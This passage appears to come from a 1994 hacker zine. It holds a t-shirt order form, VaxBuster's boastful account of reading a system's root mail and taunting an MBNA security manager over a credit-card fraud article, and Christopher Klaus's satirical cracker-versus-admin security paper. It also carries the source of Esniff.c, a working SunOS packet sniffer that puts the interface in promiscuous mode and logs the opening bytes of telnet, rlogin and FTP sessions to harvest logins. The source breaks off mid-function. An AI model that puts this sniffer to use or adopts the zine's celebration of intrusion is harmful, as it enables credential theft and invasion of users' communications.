  3055. these amazing shirts.  Impress members of the opposite sex, increase
  3056. your IQ, annoy system administrators, get raided by the government and
  3057. lose your wardrobe!
  3058.  
  3059. Can a t-shirt really do all this?  Of course it can!
  3060.  
  3061. --------------------------------------------------------------------------
  3062.  
  3063. "THE HACKER WAR  --  LOD vs MOD"
  3064.  
  3065. This t-shirt chronicles the infamous "Hacker War" between rival
  3066. groups The Legion of Doom and  The Masters of Destruction.  The front
  3067. of the shirt displays a flight map of the various battle-sites
  3068. hit by MOD and tracked by LOD.  The back of the shirt
  3069. has a detailed timeline of the key dates in the conflict, and
  3070. a rather ironic quote from an MOD member.
  3071.  
  3072. (For a limited time, the original is back!)
  3073.  
  3074. "LEGION OF DOOM  --  INTERNET WORLD TOUR"
  3075.  
  3076. The front of this classic shirt displays "Legion of Doom Internet World
  3077. Tour" as well as a sword and telephone intersecting the planet
  3078. earth, skull-and-crossbones style.  The back displays the
  3079. words "Hacking for Jesus" as well as a substantial list of "tour-stops"
  3080. (internet sites) and a quote from Aleister Crowley.
  3081.  
  3082. --------------------------------------------------------------------------
  3083.  
  3084. All t-shirts are sized XL, and are 100% cotton.
  3085.  
  3086. Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
  3087. postage.
  3088.  
  3089. Send checks or money orders.  Please, no credit cards, even if
  3090. it's really your card.
  3091.  
  3092.  
  3093. Name:       __________________________________________________
  3094.  
  3095. Address:    __________________________________________________
  3096.  
  3097. City, State, Zip:   __________________________________________
  3098.  
  3099.  
  3100. I want ____ "Hacker War" shirt(s)
  3101.  
  3102. I want ____ "Internet World Tour" shirt(s)
  3103.  
  3104. Enclosed is $______ for the total cost.
  3105.  
  3106.  
  3107. Mail to:   Chris Goggans
  3108.            603 W. 13th #1A-278
  3109.            Austin, TX 78701
  3110.  
  3111.  
  3112. These T-shirts are sold only as a novelty items, and are in no way
  3113. attempting to glorify computer crime.
  3114.  
  3115. ------------------------------------------------------------------------------
  3116.  
  3117. My dealing with MBNA - VaxBuster March 8, 1994
  3118. ----------------------------------------------
  3119.  
  3120.  A friend approached me on Unphamiliar Terrorities with a pretty
  3121. funny message.  It turns out that a high-up executive in MBNA sent mail to
  3122. root at system with public temporary directories, where an issue of Phrack
  3123. 44 was stored.  My friend was monitoring root's mail, when he came across
  3124. the following message.
  3125.  
  3126. To: root@<censored>
  3127. Message-Id:  <9401141340.aa09874@krusty.ee.udel.edu>
  3128. Status: RO
  3129.  
  3130. Hello, The reason I am sending this message to you is an article
  3131. that seems to have been on your system <censored>.  I am an Information
  3132. Security Assurance manager at the largest issuer of Goldcard Mastercard
  3133. and Visa's in the world "MBNA America".  The article seems to be a
  3134. copy or issue of "Phrack Magazine" written by "Vaxbuster".  It
  3135. describes in detail how one could defraud credit card companies.  I
  3136. have talked with the CERT People in CMU to see if I could get a
  3137. contact at your UNIV.  There may be an additional 21 or so of these
  3138. articles that I would love to get ahold of to protect my company.
  3139. Please, if you can, send me your phone number so I can talk with you
  3140. in more detail.  My phone number at MBNA in Delaware is <censored>.
  3141.  
  3142. I can verify whatever information you may require over the phone or in
  3143. writing.
  3144.  
  3145. Thank you for your help.
  3146.  
  3147. PS.  We do not have a gateway or firewall to the Internet from here so
  3148. the good People at UofDE allow me to have access from there systems.
  3149.  
  3150. MBNA America Bank, NA.
  3151. 400 Christiana Road
  3152. Newark, DE 19713
  3153.  
  3154.      Anyways, a couple people suggested that I call, and at first I
  3155. thought that was a ridiculous idea, but I figured, what the hell, it may
  3156. be funny. So NightStriker and I called him at his office one day in
  3157. Mid-February.  I was surprized he answered, and not a secretary,
  3158. considering his position.  I asked for him, and identified myself as
  3159. VaxBuster. He shocked the hell out of me, because I really didn't
  3160. expect him to immediately recognize my handle.  He says, "Oh hey! how are
  3161. you doing?"  I told him I'd been monitoring mail, and came across his
  3162. message.  The main reason why I was calling was because he had mentioned
  3163. he wanted 'more info' to protect his company.  NTS and I were more than happy
  3164. to answer any of his questions - but he said that he had obtained all of the
  3165. issues.  Although he said he had all of them, I highly doubt it, because he
  3166. said he had like 20-some issues, and we told him there was 44.  We chatted
  3167. for about 15 more minutes, just about the reasons for publishing and not
  3168. publishing such an article.  He said "Some little kid is going to find this
  3169. article and get his fingers burned" I could tell he was kind of pressured for
  3170. time, so we kind of let it go at that, and he asked for our numbers to call us
  3171. back.  Oh, when I first called him, I didn't tell him I had a friend on the
  3172. line, and he asked, "Is there an echo here?" hahahaha. Pretty funny.  We
  3173. told him NTS was there.  So, when he asked for our numbers, we laughed out
  3174. loud.  I guess he doesn't really understand the secrecy we all so dearly
  3175. cheerish.  He said, "Well, I have caller id, so I have your numbers anyways"
  3176. Bahahhahahaha. Yeah, right.  We told him we were bouncing our call through
  3177. a satellite in Japan.  He thought we were joking.  Guess he doesn't understand
  3178. boxing huh?  Maybe we should show him some of Tabas's files. heh.  We told him
  3179. we would call him back - which we haven't yet, but soon will.  By the way, he
  3180. complimented me on the quality of the article and how detailed it was. :)
  3181.  
  3182.      Incidentally, for those of you who've lived in a cave, this is all
  3183. in reference to an article of mine published in Phrack 44 called 'Safe and
  3184. Easy Carding.'
  3185.  
  3186. And for all of you who didn't like my article - Fuck you.
  3187. Greets out to all the eleets - Later.
  3188.  
  3189. VaxBuster '94
  3190.  
  3191.  
  3192. ------------------------------------------------------------------------------
  3193.  
  3194.         A Guide to Internet Security: Becoming an Uebercracker
  3195.         and Becoming an UeberAdmin to stop Uebercrackers.
  3196.  
  3197.  
  3198. Author: Christopher Klaus <cklaus@shadow.net>
  3199. Date: December 5th, 1993.
  3200. Version: 1.1
  3201.  
  3202.   This is a paper will be broken into two parts, one showing 15 easy steps
  3203. to becoming a uebercracker and the next part showing how to become a
  3204. ueberadmin and how to stop a uebercracker.  A uebercracker is a term phrased
  3205. by Dan Farmer to refer to some elite (cr/h)acker that is practically
  3206. impossible to keep out of the networks.
  3207.  
  3208. Here's the steps to becoming a uebercracker.
  3209.  
  3210. Step 1. Relax and remain calm. Remember YOU are a Uebercracker.
  3211.  
  3212. Step 2. If you know a little Unix, you are way ahead of the crowd and skip
  3213. past step 3.
  3214.  
  3215. Step 3. You may want to buy Unix manual or book to let you know what
  3216. ls,cd,cat does.
  3217.  
  3218. Step 4. Read Usenet for the following groups: alt.irc, alt.security,
  3219. comp.security.unix.  Subscribe to Phrack@well.sf.ca.us to get a background
  3220. in uebercracker culture.
  3221.  
  3222. Step 5. Ask on alt.irc how to get and compile the latest IRC client and
  3223. connect to IRC.
  3224.  
  3225. Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
  3226. there!)
  3227.  
  3228. Step 7. Now, sit on #hack and send messages to everyone in the channel
  3229. saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks
  3230. questions like "Why cant I join #warez?"
  3231.  
  3232. Step 8. (Important Step) Send private messages to everyone asking for new
  3233. bugs or holes. Here's a good pointer, look around your system for binary
  3234. programs suid root (look in Unix manual from step 3 if confused). After
  3235. finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
  3236. new bug in that program and you wrote a script for it.  If they ask how it
  3237. works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
  3238. them to trade for their get-root scripts.
  3239.  
  3240. Step 9. Make them send you some scripts before you send some garbage file
  3241. (ie. a big core file). Tell them it is encrypted or it was messed up and
  3242. you need to upload your script again.
  3243.  
  3244. Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be
  3245. obnoxious on #hack otherwise people will look down on you and not give you
  3246. anything.)
  3247.  
  3248. Step 11. Hopefully you will now have at least one or two scripts that get
  3249. you root on most Unixes. Grab root on your local machines, read your
  3250. admin's mail, or even other user's mail, even rm log files and whatever
  3251. temps you. (look in Unix manual from step 3 if confused).
  3252.  
  3253. Step 12. A good test for true uebercrackerness is to be able to fake mail.
  3254. Ask other uebercrackers how to fake mail (because they have had to pass the
  3255. same test). Email your admin how "layme" he is and how you got root and how
  3256. you erased his files, and have it appear coming from satan@evil.com.
  3257.  
  3258. Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
  3259. about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
  3260. a uebercracker.)
  3261.  
  3262. Step 14. Wait a few months and have all your notes, etc ready in your room
  3263. for when the FBI, Secret Service, and other law enforcement agencies
  3264. confiscate your equipment. Call eff.org to complain how you were innocent
  3265. and how you accidently gotten someone else's account and only looked
  3266. because you were curious. (Whatever else that may help, throw at them.)
  3267.  
  3268. Step 15. Now for the true final supreme eliteness of all uebercrackers, you
  3269. go back to #hack and brag about how you were busted.  YOU are finally a
  3270. true Uebercracker.
  3271.  
  3272.  
  3273. Now the next part of the paper is top secret.  Please only pass to trusted
  3274. administrators and friends and even some trusted mailing lists, Usenet
  3275. groups, etc. (Make sure no one who is NOT in the inner circle of security
  3276. gets this.)
  3277.  
  3278. This is broken down on How to Become an UeberAdmin (otherwise know as a
  3279. security expert) and How to stop Uebercrackers.
  3280.  
  3281. Step 1. Read Unix manual ( a good idea for admins ).
  3282.  
  3283. Step 2. Very Important.  chmod 700 rdist; chmod 644 /etc/utmp. Install
  3284. sendmail 8.6.4.  You have probably stopped 60 percent of all Uebercrackers
  3285. now.  Rdist scripts is among the favorites for getting root by
  3286. uebercrackers.
  3287.  
  3288. Step 3. Okay, maybe you want to actually secure your machine from the
  3289. elite Uebercrackers who can break into any site on Internet.
  3290.  
  3291. Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
  3292. packets. (This only applies to advanced admins who have control of the
  3293. router, but this will stop 90% of all uebercrackers from attempting your
  3294. site.)
  3295.  
  3296. Step 5. Apply all CERT and vendor patches to all of your machines. You have
  3297. just now killed 95% of all uebercrackers.
  3298.  
  3299. Step 6. Run a good password cracker to find open accounts and close them.
  3300. Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
  3301. to find if a uebercracker is knocking on your machines.  Run ISS to make
  3302. sure that all your machines are reasonably secure as far as remote
  3303. configuration (ie. your NFS exports and anon FTP site.)
  3304.  
  3305. Step 7. If you have done all of the following, you will have stopped 99%
  3306. of all uebercrackers. Congrats! (Remember, You are the admin.)
  3307.  
  3308. Step 8. Now there is one percent of uebercrackers that have gained
  3309. knowledge from reading some security expert's mail (probably gained access
  3310. to his mail via NFS exports or the guest account.  You know how it is, like
  3311. the mechanic that always has a broken car, or the plumber that has the
  3312. broken sink, the security expert usually has an open machine.)
  3313.  
  3314. Step 9. Here is the hard part is to try to convince these security experts
  3315. that they are not so above the average citizen and that by now giving out
  3316. their unknown (except for the uebercrackers) security bugs, it would be a
  3317. service to Internet.  They do not have to post it on Usenet, but share
  3318. among many other trusted people and hopefully fixes will come about and
  3319. new pressure will be applied to vendors to come out with patches.
  3320.  
  3321. Step 10.  If you have gained the confidence of enough security experts,
  3322. you will know be a looked up to as an elite security administrator that is
  3323. able to stop most uebercrackers.  The final true test for being a ueberadmin
  3324. is to compile a IRC client, go onto #hack and log all the bragging and
  3325. help catch the uebercrackers. If a uebercracker does get into your system,
  3326. and he has used a new method you have never seen, you can probably tell
  3327. your other security admins and get half of the replies like - "That bug
  3328. been known for years, there just isn't any patches for it yet. Here's my
  3329. fix." and the other half of the replies will be like - "Wow.  That is very
  3330. impressive. You have just moved up a big notch in my security circle."
  3331. VERY IMPORTANT HERE:  If you see anyone in Usenet's security newsgroups
  3332. mention anything about that security hole, Flame him for discussing it
  3333. since it could bring down Internet and all Uebercrackers will now have it
  3334. and the million other reasons to keep everything secret about security.
  3335.  
  3336.  
  3337. Well, this paper has shown the finer details of security on Internet. It has
  3338. shown both sides of the coin.  Three points I would like to make that would
  3339. probably clean up most of the security problems on Internet are as the
  3340. following:
  3341.  
  3342. 1.  Vendors need to make security a little higher than zero in priority.
  3343. If most vendors shipped their Unixes already secure with most known bugs
  3344. that have been floating around since the Internet Worm (6 years ago) fixed
  3345. and patched, then most uebercrackers would be stuck as new machines get
  3346. added to Internet.  (I believe Uebercracker is German for "lame copy-cat
  3347. that can get root with 3 year old bugs.") An interesting note is that
  3348. if you probably check the mail alias for "security@vendor.com", you will
  3349. find it points to /dev/null.  Maybe with enough mail, it will overfill
  3350. /dev/null.  (Look in manual if confused.)
  3351.  
  3352. 2.  Security experts giving up the attitude that they are above the normal
  3353. Internet user and try to give out information that could lead to pressure
  3354. by other admins to vendors to come out with fixes and patches.  Most
  3355. security experts probably don't realize how far their information has
  3356. already  spread.
  3357.  
  3358. 3.  And probably one of the more important points is just following the
  3359. steps I have outlined for Stopping a Uebercracker.
  3360.  
  3361.  
  3362. Resources for Security:
  3363.    Many security advisories are available from anonymous ftp cert.org.
  3364. Ask archie to find tcp_wrapper, security programs.  For more information
  3365. about ISS (Internet Security Scanner), email cklaus@shadow.net.
  3366.  
  3367.  
  3368. Acknowledgments:
  3369.  
  3370.    Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
  3371. Miles, Scott Yelich, and Henri De Valois.
  3372.  
  3373.  
  3374. Copyright:
  3375.  
  3376. This paper is Copyright 1993, 1994.  Please distribute to only trusted
  3377. people.  If you modify, alter, disassemble, reassemble, re-engineer or have
  3378. any suggestions or comments, please send them to:
  3379.  
  3380. cklaus@shadow.net
  3381.  
  3382.  
  3383.  
  3384. ------------------------------------------------------------------------------
  3385.  
  3386. /* [JOIN THE POSSE!] */
  3387.  
  3388. /* Esniff.c */
  3389.  
  3390. #include <stdio.h>
  3391. #include <ctype.h>
  3392. #include <string.h>
  3393.  
  3394. #include <sys/time.h>
  3395. #include <sys/file.h>
  3396. #include <sys/stropts.h>
  3397. #include <sys/signal.h>
  3398. #include <sys/types.h>
  3399. #include <sys/socket.h>
  3400. #include <sys/ioctl.h>
  3401.  
  3402. #include <net/if.h>
  3403. #include <net/nit_if.h>
  3404. #include <net/nit_buf.h>
  3405. #include <net/if_arp.h>
  3406.  
  3407. #include <netinet/in.h>
  3408. #include <netinet/if_ether.h>
  3409. #include <netinet/in_systm.h>
  3410. #include <netinet/ip.h>
  3411. #include <netinet/udp.h>
  3412. #include <netinet/ip_var.h>
  3413. #include <netinet/udp_var.h>
  3414. #include <netinet/in_systm.h>
  3415. #include <netinet/tcp.h>
  3416. #include <netinet/ip_icmp.h>
  3417.  
  3418. #include <netdb.h>
  3419. #include <arpa/inet.h>
  3420.  
  3421. #define ERR stderr
  3422.  
  3423. char    *malloc();
  3424. char    *device,
  3425.         *ProgName,
  3426.         *LogName;
  3427. FILE    *LOG;
  3428. int     debug=0;
  3429.  
  3430. #define NIT_DEV     "/dev/nit"
  3431. #define CHUNKSIZE   4096        /* device buffer size */
  3432. int     if_fd = -1;
  3433. int     Packet[CHUNKSIZE+32];
  3434.  
  3435. void Pexit(err,msg)
  3436. int err; char *msg;
  3437. { perror(msg);
  3438.   exit(err); }
  3439.  
  3440. void Zexit(err,msg)
  3441. int err; char *msg;
  3442. { fprintf(ERR,msg);
  3443.   exit(err); }
  3444.  
  3445. #define IP          ((struct ip *)Packet)
  3446. #define IP_OFFSET   (0x1FFF)
  3447. #define SZETH       (sizeof(struct ether_header))
  3448. #define IPLEN       (ntohs(ip->ip_len))
  3449. #define IPHLEN      (ip->ip_hl)
  3450. #define TCPOFF      (tcph->th_off)
  3451. #define IPS         (ip->ip_src)
  3452. #define IPD         (ip->ip_dst)
  3453. #define TCPS        (tcph->th_sport)
  3454. #define TCPD        (tcph->th_dport)
  3455. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  3456.  
  3457. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  3458.  
  3459. #define MAXBUFLEN  (128)
  3460. time_t  LastTIME = 0;
  3461.  
  3462. struct CREC {
  3463.      struct CREC *Next,
  3464.                  *Last;
  3465.      time_t  Time;              /* start time */
  3466.      struct in_addr SRCip,
  3467.                     DSTip;
  3468.      u_int   SRCport,           /* src/dst ports */
  3469.              DSTport;
  3470.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  3471.      u_int   Length;            /* current data length */
  3472.      u_int   PKcnt;             /* # pkts */
  3473.      u_long  LASTseq;
  3474. };
  3475.  
  3476. struct CREC *CLroot = NULL;
  3477.  
  3478. char *Symaddr(ip)
  3479. register struct in_addr ip;
  3480. { register struct hostent *he =
  3481.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  3482.  
  3483.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  3484. }
  3485.  
  3486. char *TCPflags(flgs)
  3487. register u_char flgs;
  3488. { static char iobuf[8];
  3489. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  3490.  
  3491.   SFL(0,TH_FIN, 'F');
  3492.   SFL(1,TH_SYN, 'S');
  3493.   SFL(2,TH_RST, 'R');
  3494.   SFL(3,TH_PUSH,'P');
  3495.   SFL(4,TH_ACK, 'A');
  3496.   SFL(5,TH_URG, 'U');
  3497.   iobuf[6]=0;
  3498.   return(iobuf);
  3499. }
  3500.  
  3501. char *SERVp(port)
  3502. register u_int port;
  3503. { static char buf[10];
  3504.   register char *p;
  3505.  
  3506.    switch(port) {
  3507.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  3508.      case IPPORT_TELNET:      p="telnet"; break;
  3509.      case IPPORT_SMTP:        p="smtp"; break;
  3510.      case IPPORT_FTP:         p="ftp"; break;
  3511.      default: sprintf(buf,"%u",port); p=buf; break;
  3512.    }
  3513.    return(p);
  3514. }
  3515.  
  3516. char *Ptm(t)
  3517. register time_t *t;
  3518. { register char *p = ctime(t);
  3519.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  3520.   return(p);
  3521. }
  3522.  
  3523. char *NOWtm()
  3524. { time_t tm;
  3525.   time(&tm);
  3526.   return( Ptm(&tm) );
  3527. }
  3528.  
  3529. #define MAX(a,b) (((a)>(b))?(a):(b))
  3530. #define MIN(a,b) (((a)<(b))?(a):(b))
  3531.  
  3532. /* add an item */
  3533. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  3534.   register struct CREC *CLtmp = \
  3535.         (struct CREC *)malloc(sizeof(struct CREC)); \
  3536.   time( &(CLtmp->Time) ); \
  3537.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  3538.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  3539.   CLtmp->SRCport = SPORT; \
  3540.   CLtmp->DSTport = DPORT; \
  3541.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  3542.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  3543.   CLtmp->PKcnt = 1; \
  3544.   CLtmp->Next = CLroot; \
  3545.   CLtmp->Last = NULL; \
  3546.   CLroot = CLtmp; \
  3547. }
  3548.  
  3549. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  3550. register struct in_addr Sip,Dip;
  3551. register u_int SP,DP;
  3552. { register struct CREC *CLr = CLroot;
  3553.  
  3554.   while(CLr != NULL) {
  3555.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  3556.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  3557.             break;
  3558.     CLr = CLr->Next;
  3559.   }
  3560.   return(CLr);
  3561. }
  3562.  
  3563. #define ADDDATA_NODE(CL,DATA,LEN) { \
  3564.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  3565.  CL->Length += LEN; \
  3566. }
  3567.  
  3568. #define PR_DATA(dp,ln) {    \
  3569.   register u_char lastc=0; \
  3570.   while(ln-- >0) { \
  3571.      if(*dp < 32) {  \
  3572.         switch(*dp) { \
  3573.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  3574.                         break; \
  3575.             case '\r': \
  3576.             case '\n': fprintf(LOG,"\n     : "); \
  3577.                         break; \
  3578.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  3579.                         break; \
  3580.         } \
  3581.      } else { \
  3582.         if(isprint(*dp)) fputc(*dp,LOG); \
  3583.         else fprintf(LOG,"(%d)",*dp); \
  3584.      } \
  3585.      lastc = *dp++; \
  3586.   } \
  3587.   fflush(LOG); \
  3588. }
  3589.  
  3590. void END_NODE(CLe,d,dl,msg)
  3591. register struct CREC *CLe;
  3592. register u_char *d;
  3593. register int dl;
  3594. register char *msg;
  3595. {
  3596.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  3597.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  3598.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  3599.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  3600.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  3601.    fprintf(LOG," DATA: ");
  3602.     { register u_int i = CLe->Length;
  3603.       register u_char *p = CLe->Data;
  3604.       PR_DATA(p,i);
  3605.       PR_DATA(d,dl);
  3606.     }
  3607.  
  3608.    fprintf(LOG,"\n-- \n");
  3609.    fflush(LOG);
  3610.  
  3611.    if(CLe->Next != NULL)
  3612.     CLe->Next->Last = CLe->Last;
  3613.    if(CLe->Last != NULL)
  3614.     CLe->Last->Next = CLe->Next;
  3615.    else
  3616.     CLroot = CLe->Next;
  3617.    free(CLe);
  3618. }
  3619.  
  3620. /* 30 mins (x 60 seconds) */
  3621. #define IDLE_TIMEOUT 1800
  3622. #define IDLE_NODE() { \
  3623.   time_t tm; \
  3624.   time(&tm); \
  3625.   if(LastTIME<tm) { \
  3626.      register struct CREC *CLe,*CLt = CLroot; \
  3627.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  3628.      while(CLe=CLt) { \
  3629.        CLt=CLe->Next; \
  3630.        if(CLe->Time <tm) \
  3631.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  3632.      } \
  3633.   } \
  3634. }
  3635.  
  3636. void filter(cp, pktlen)
  3637. register char *cp;
  3638. register u_int pktlen;
  3639. {
  3640.  register struct ip     *ip;
  3641.  register struct tcphdr *tcph;
  3642.  
  3643.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  3644.  
  3645.    if(EtherType < 0x600) {
  3646.      EtherType = *(u_short *)(cp + SZETH + 6);
  3647.      cp+=8; pktlen-=8;
  3648.    }
  3649.  
  3650.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  3651.       return;
  3652.  }
  3653.  
  3654.     /* ugh, gotta do an alignment :-( */
  3655.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  3656.  
  3657.  ip = (struct ip *)Packet;
  3658.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  3659.     return;
  3660.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  3661.  
  3662.  if(!( (TCPD == IPPORT_TELNET) ||
  3663.        (TCPD == IPPORT_LOGINSERVER) ||
  3664.        (TCPD == IPPORT_FTP)
  3665.    )) return;
  3666.  
  3667.  { register struct CREC *CLm;
  3668.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  3669.    register u_char *p = (u_char *)Packet;
  3670.  
  3671.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  3672.  
  3673.  if(debug) {
  3674.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  3675.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  3676.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  3677.  }
  3678.  
  3679.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  3680.  
  3681.       CLm->PKcnt++;
  3682.  
  3683.       if(length>0)
  3684.         if( (CLm->Length + length) < MAXBUFLEN ) {
  3685.           ADDDATA_NODE( CLm, p,length);
  3686.         } else {
  3687.           END_NODE( CLm, p,length, "DATA LIMIT");
  3688.         }
  3689.  
  3690.       if(TCPFL(TH_FIN|TH_RST)) {
  3691.           END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  3692.       }
  3693.  
  3694.    } else {
  3695.  
  3696.       if(TCPFL(TH_SYN)) {
  3697.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  3698.       }
  3699.  
  3700.    }
  3701.  
  3702.    IDLE_NODE();
  3703.  
  3704.  }
  3705.  
  3706. }
  3707.  
  3708. /* signal handler
  3709.  */
  3710. void death()
  3711. { register struct CREC *CLe;
  3712.  
  3713.     while(CLe=CLroot)
  3714.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  3715.  
  3716.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  3717.     fflush(LOG);
  3718.     if(LOG != stdout)
  3719.         fclose(LOG);
  3720.     exit(1);
  3721. }
  3722.  
  3723. /* opens network interface, performs ioctls and reads from it,
  3724.  * passing data to filter function
  3725.  */
  3726. void do_it()
  3727. {
  3728.     int cc;
  3729.     char *buf;
  3730.     u_short sp_ts_len;
  3731.  
  3732.     if(!(buf=malloc(CHUNKSIZE)))
  3733.         Pexit(1,"Eth: malloc");
  3734.  
  3735. /* this /dev/nit initialization code pinched from etherfind */
  3736.   {
  3737.     struct strioctl si;
  3738.     struct ifreq    ifr;
  3739.     struct timeval  timeout;
  3740.     u_int  chunksize = CHUNKSIZE;
  3741.     u_long if_flags  = NI_PROMISC;
  3742.  
  3743.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  3744.         Pexit(1,"Eth: nit open");
  3745.  
  3746.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  3747.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  3748.  
  3749.     si.ic_timout = INFTIM;
  3750.  
  3751.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  3752.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  3753.  
  3754.     timeout.tv_sec = 1;
  3755.     timeout.tv_usec = 0;
  3756.     si.ic_cmd = NIOCSTIME;
  3757.     si.ic_len = sizeof(timeout);
  3758.     si.ic_dp  = (char *)&timeout;
  3759.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  3760.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  3761.  
  3762.     si.ic_cmd = NIOCSCHUNK;
  3763.     si.ic_len = sizeof(chunksize);
  3764.     si.ic_dp  = (char *)&chunksize;
  3765.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  3766.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  3767.  
  3768.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  3769.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  3770.     si.ic_cmd = NIOCBIND;
  3771.     si.ic_len = sizeof(ifr);
  3772.     si.ic_dp  = (char *)𝔦
  3773.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  3774.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  3775.  
  3776.     si.ic_cmd = NIOCSFLAGS;
  3777.     si.ic_len = sizeof(if_flags);
  3778.     si.ic_dp  = (char *)&if_flags;
  3779.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  3780.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  3781.  
  3782.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  3783.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  3784.   }
  3785.  
  3786.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  3787.         register char *bp = buf,
  3788.                       *bufstop = (buf + cc);
  3789.  
  3790.         while (bp < bufstop) {
  3791.             register char *cp = bp;
  3792.             register struct nit_bufhdr *hdrp;
  3793.  
  3794.             hdrp = (struct nit_bufhdr *)cp;
  3795.             cp += sizeof(struct nit_bufhdr);
  3796.             bp += hdrp->nhb_totlen;
  3797.             filter(cp, (u_long)hdrp->nhb_msglen);
  3798.         }
  3799.     }
  3800.     Pexit((-1),"Eth: read");
  3801. }
  3802.  /* Authorize your proogie,generate your own password and uncomment here */
  3803. /* #define AUTHPASSWD "EloiZgZejWyms" */
  3804.  
  3805. void getauth()
  3806. { char *buf,*getpass(),*crypt();
  3807.   char pwd[21],prmpt[81];
  3808.  
  3809.     strcpy(pwd,AUTHPASSWD);
  3810.     sprintf(prmpt,"(%s)UP? ",ProgName);
  3811.     buf=getpass(prmpt);
  3812.     if(strcmp(pwd,crypt(buf,pwd)))
  3813.         exit(1);
  3814. }
  3815.     */
  3816. void main(argc, argv)
  3817. int argc;
  3818. char **argv;
  3819. {
  3820.     char   cbuf[BUFSIZ];
  3821.     struct ifconf ifc;
  3822.     int    s,
  3823.            ac=1,
  3824.            backg=0;
  3825.  
  3826.     ProgName=argv[0];
  3827.  
  3828.  /*     getauth(); */
  3829.  
  3830.     LOG=NULL;
  3831.     device=NULL;
  3832.     while((ac<argc) && (argv[ac][0] == '-')) {
  3833.        register char ch = argv[ac++][1];
  3834.        switch(toupper(ch)) {
  3835.             case 'I': device=argv[ac++];
  3836.                       break;
  3837.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  3838.                          Zexit(1,"Output file cant be opened\n");
  3839.                       break;
  3840.             case 'B': backg=1;
  3841.                       break;
  3842.             case 'D': debug=1;
  3843.                       break;
  3844.             default : fprintf(ERR,
  3845.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  3846.                             ProgName);
  3847.                       exit(1);
  3848.        }
  3849.     }
  3850.  
  3851.     if(!device) {
  3852.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  3853.             Pexit(1,"Eth: socket");
  3854.  
